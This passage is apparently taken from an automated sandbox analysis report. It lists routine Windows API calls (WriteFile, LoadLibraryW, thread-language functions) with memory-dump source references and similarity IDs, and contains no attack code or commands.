                                                          • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,02F79BB2,?,?,00000000), ref: 02F79B4E
                                                          • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,02F79BB2,?,?), ref: 02F79B54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Similarity
                                                          • API ID: FileHandleWrite
                                                          • String ID: Error$Runtime error at 00000000
                                                          • API String ID: 3320372497-2970929446
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(user32.dll,03460B3B,00000000,03460EDA), ref: 0311C805
                                                          • LoadLibraryW.KERNEL32(kernel32.dll,user32.dll,03460B3B,00000000,03460EDA), ref: 0311C814
                                                          • LoadLibraryW.KERNEL32(ntdll.dll,kernel32.dll,user32.dll,03460B3B,00000000,03460EDA), ref: 0311C823
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: kernel32.dll$ntdll.dll$user32.dll
                                                          • API String ID: 1029625771-3818928520
                                                          APIs
                                                          • GetThreadUILanguage.KERNEL32(?,00000000), ref: 02F7D975
                                                          • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 02F7D9D3
                                                          • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 02F7DA30
                                                          • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 02F7DA63
                                                            • Part of subcall function 02F7D920: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,02F7D9E1), ref: 02F7D937
                                                            • Part of subcall function 02F7D920: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,02F7D9E1), ref: 02F7D954
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Similarity
                                                          • API ID: Thread$LanguagesPreferred$Language
                                                          • String ID:
                                                          • API String ID: 2255706666-0